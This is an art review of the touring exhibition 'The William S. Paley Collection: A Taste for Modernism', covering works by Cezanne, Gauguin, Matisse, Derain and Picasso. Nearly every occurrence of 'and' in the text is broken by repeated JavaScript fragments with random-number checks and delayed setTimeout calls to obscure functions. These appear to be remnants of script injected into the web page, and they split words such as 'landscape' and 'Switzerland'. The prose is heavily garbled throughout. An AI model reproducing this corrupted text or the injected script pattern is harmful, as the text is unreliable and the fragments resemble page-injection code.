Just as he embraced new technologies in the broadcast field, William S. Paley was attracted to innovative developments in Modern art. In the 1960s, Paley, broadening his horizons, began assembling works by younger, usually American artists.

The best-known work in the Paley Collection is Picasso’s “Boy Leading a Horse.”
Some 60 works by 24 artists are included in a touring exhibition, “The William S. Paley Collection: A Taste for Modernism,” on view at Crystal Bridges Museum of American Art through July 7. It has already been seen in San Francisco; Portlandom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and, Maine, andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and Musee national des beaux-arts du Quebec. Spanning a century of artistic creativity, 1860s–1960s, the Paley Collection showcases the rich variety of Modern art, while reflecting the personal vision of an astute collector. It tends to favor works that are intimate in both format andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and character. As former MoMA director Richard E. Oldenburg observed of the extraordinary Paley trove, “For generations to come, the presence of these works in our galleries will testify to the lasting influence of this remarkable man on the Museum of Modern Art andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and, indeed, on the fabric of modern life.”
The show begins, appropriately, with Paley’s first collection work, painted by the father of Modern art, Cezanne. His “Self-Portrait in a Straw Hat,” acquired in 1935, features a brighter palette andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and more detached portrayal, reflecting the artist’s “impressionist” period. Paley soon followed up with purchase of a grandom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and Cezanne landom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andscape, “L’Estaque,” painted from a typically high vantage point, with surrounding trees andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and cliffs focusing attention on the blue bay beyond. Likely impressed by its structural power, “L’Estaque” was bought by Impressionist leader Claude Monet for his personal collection, hanging in his home in Giverny, 1896–mid-1930s, when it was sold by his son.
Paley later added several Cezanne drawings andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and a quintessential still life, “Milk Can andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and Apples,” which appears casually composed, but actually is the result of careful thought about its groupings andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and spacings.
Early on, Paley was intrigued by the work of Gauguin, who flouted convention by using boldly colored, flattened planes andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and “exotic” subjects in Tahiti as a means of reinvigorating Western art. Gauguin’s powerful “The Seed of the Areoi,” modeled by the artist’s 13-year-old native mistress, depicts a mythological cult mother in a boldly hued composition that combines themes of ritual timelessness andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and contemporary reality in a single figure. Paley also acquired “Washerwomen,” painted by Gauguin during his stormy stay with Vincent van Gogh in Arles. The broadened forms of the women at work in Arlesianne costumes on the banks of a river give the image a primitive feel.
Paley’s love of color generated enthusiasm for the strident color, bold brushwork, andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and violent distortions of French Fauvist artists, led by Matisse. The most important paintings by that artist on view are “Odalisque with a Tambourine,” featuring a robust, languorous nude posed on a colorful armchair; “Woman with a Veil,” focusing on the veiled gaze of a seated women garbed in an outfit that is a jumble of jarring, brilliant colors with yellow cross hatchings; andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and “Seated Woman with a Vase of Amaryllis,” an energetic depiction of a sedate woman in a bold yellow andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and black dress juxtaposed against a background filled with flowers andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and decorative patterns. They underscore Matisse’s adventurous uses of color andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and his daringly varied compositional strategies that mark him as one of the great Modern masters.
Paley’s other favorite Fauvist, Andre Derain, is represented by two brightly hued landom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andscapes that, in the words of MoMA’s celebrated curator, the late William A. Rubin, “share the splendor of a superbly inventive palette which, while arbitrary in relation to nature, forms convincing color chords of astonishing richness.”

Works by these artists in the Paley Collection invite instructive comparisons between their work practices, suggesting their Modernist preoccupation with relationships among objects, their surrounding space andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and the surface of the canvas. Paley’s prize Picasso was acquired under dramatic circumstances. In 1936, the huge painting was smuggled out of Nazi Germany to Switzerlandom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and by dealer Justin Thannhauser, andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and was hurriedly andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and secretly offered for sale in Geneva. The monumental, iconic canvas, “Boy Leading a Horse,” shows a young circus performer, sans clothes, striding forward with his right arm positioned as if leading the horse by reins. It suggests, says Rubin, the 24-year-old Spaniard’s “increasing awareness of his own singular power andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and authority as a painter….[It] is Picasso’s monumental paean to the theme of mastery.”
In the years leading up to World War I, Picasso teamed up with Georges Braque to radically re-envision realism through invention of Cubism, a revolutionary style involving fragmentation of forms into faceted planes rearranged across compositions to show multiple viewpoints. Paley acquired a symbol-filled, brownish, hard to read example, “The Architect’s Table,” one of the artist’s most abstract works. Acquired from Gertrude Stein’s estate, it is, explains Rubin, a “fabric of flat, shaded planes —often more transparent than opaque — which hover in an indeterminate, atmospheric space shimmering with tiny, almost Neo-Impressionist brushstrokes.”
Paley had no overarching strategy for collecting, relying more on gathering works that caught his eye andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and stirred his soul. The eclectic, subjective nature of his collection, as well as the diversity of Modern art, is reflected in such idiosyncratic works as vividly colored figures outlined in black by Georges Roualt, a composition of floating forms by Joan Miró, a charming floral still life by Henri Rousseau andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and two haunting triptychs of severely distorted heads by Francis Bacon.
